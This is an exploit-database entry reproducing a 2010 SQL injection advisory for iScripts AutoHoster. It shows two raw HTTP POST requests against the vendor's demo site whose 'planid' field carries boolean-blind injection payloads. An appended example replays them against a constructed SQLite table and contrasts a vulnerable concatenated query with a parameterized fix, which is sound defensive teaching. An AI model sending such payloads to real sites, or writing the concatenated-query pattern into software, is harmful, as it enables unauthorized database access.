iScripts AutoHoster SQL injection Vulnerabilities

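Vulnerability ID 1050505 Vulnerability type
Published 2010-07-02 Updated 2010-07-02
CVE ID N/A CNNVD-ID N/A
Platform N/A CVSS score N/A
|Source
https://cxsecurity.com/issue/WLB-2010070018
|Vulnerability details
Vulnerability details have not been disclosed yet
|Exploit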

$-------------------------------------------------------------------------------------------------------------------
$ iScripts AutoHoster SQL injection Vulnerabilities
$ Author : Sangteamtham
$ Home : Hcegroup.net
$ Download : http://www.iscripts.com/autohoster/
$ Date : 02/07/2010
$ Email : sangteamhtham@gmail.com
$****************
$Exploit:
$
$
Code:
****************
Host: www.iscripts.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.iscripts.com/autohoster/demo/compareplans.php?id=4
Cookie: PHPSESSID=110cc00db753eaf050d491dd62c7ebb6; fcspersistslider1=6; __utma=227100805.1045538127.1278085802.1278085802.1278085802.1; __utmb=227100805; __utmc=227100805; __utmz=227100805.1278085802.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); flag_entryformfilled=autohoster
Content-Type: application/x-www-form-urlencoded
Content-Length: 82
postback=H&id=4&selecteddomain=&domainid=&planid=12 and 1=0--&domopt=H&ddomain=hcegroup.net&tld=biz

****************
Host: www.iscripts.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.iscripts.com/autohoster/demo/compareplans.php?id=4
Cookie: PHPSESSID=110cc00db753eaf050d491dd62c7ebb6; fcspersistslider1=6; __utma=227100805.1045538127.1278085802.1278085802.1278085802.1; __utmb=227100805; __utmc=227100805; __utmz=227100805.1278085802.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); flag_entryformfilled=autohoster
Content-Type: application/x-www-form-urlencoded
Content-Length: 82
postback=H&id=4&selecteddomain=&domainid=&planid=12 and 1=1--&domopt=H&ddomain=hcegroup.net&tld=biz

$****************
$ Greetz to: All Vietnamese hackers and Hackers out there researching for more security
$
$
$--------------------------------------------------------------------------------------------------------------------
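Added example, not part of the original advisory and not iScripts code: the two request bodies above differ only in `1=0` versus `1=1`, a boolean test of whether `planid` reaches the SQL text unmodified. The sketch replays both bodies against a constructed in-memory SQLite table (the schema and all function names are assumptions) using a concatenated query and then a validated, parameterized one.

```python
import sqlite3
from urllib.parse import parse_qs

# The two POST bodies from the advisory, plus a constructed benign one.
BODY_FALSE = ("postback=H&id=4&selecteddomain=&domainid=&planid=12 and 1=0--"
              "&domopt=H&ddomain=hcegroup.net&tld=biz")
BODY_TRUE = BODY_FALSE.replace("1=0", "1=1")
BODY_BENIGN = BODY_FALSE.replace("12 and 1=0--", "12")


def make_db():
    # Constructed schema: table and column names are assumptions,
    # not taken from AutoHoster.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE plans (plan_id INTEGER PRIMARY KEY, name TEXT)")
    db.execute("INSERT INTO plans VALUES (12, 'Starter')")
    return db


def field(body, name):
    # Decode one field of an application/x-www-form-urlencoded body.
    return parse_qs(body, keep_blank_values=True).get(name, [""])[0]


def lookup_vulnerable(db, body):
    # Flawed pattern: the raw planid string becomes part of the SQL text,
    # so "12 and 1=0--" changes the WHERE clause itself.
    sql = "SELECT name FROM plans WHERE plan_id = " + field(body, "planid")
    return db.execute(sql).fetchall()


def lookup_hardened(db, body):
    # Accept only ASCII decimal digits, then bind the value as a parameter
    # so it can never be parsed as SQL.
    planid = field(body, "planid")
    if not (planid.isascii() and planid.isdigit()):
        raise ValueError("planid must be an integer")
    query = "SELECT name FROM plans WHERE plan_id = ?"
    return db.execute(query, (int(planid),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    for label, body in (("1=0", BODY_FALSE), ("1=1", BODY_TRUE)):
        print(label, "vulnerable ->", lookup_vulnerable(db, body))
        try:
            lookup_hardened(db, body)
        except ValueError as exc:
            print(label, "hardened   -> rejected:", exc)
    print("benign hardened ->", lookup_hardened(db, BODY_BENIGN))
```

The differing row counts from the concatenated query are the signal the two requests rely on; the hardened lookup rejects both bodies before any SQL runs.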

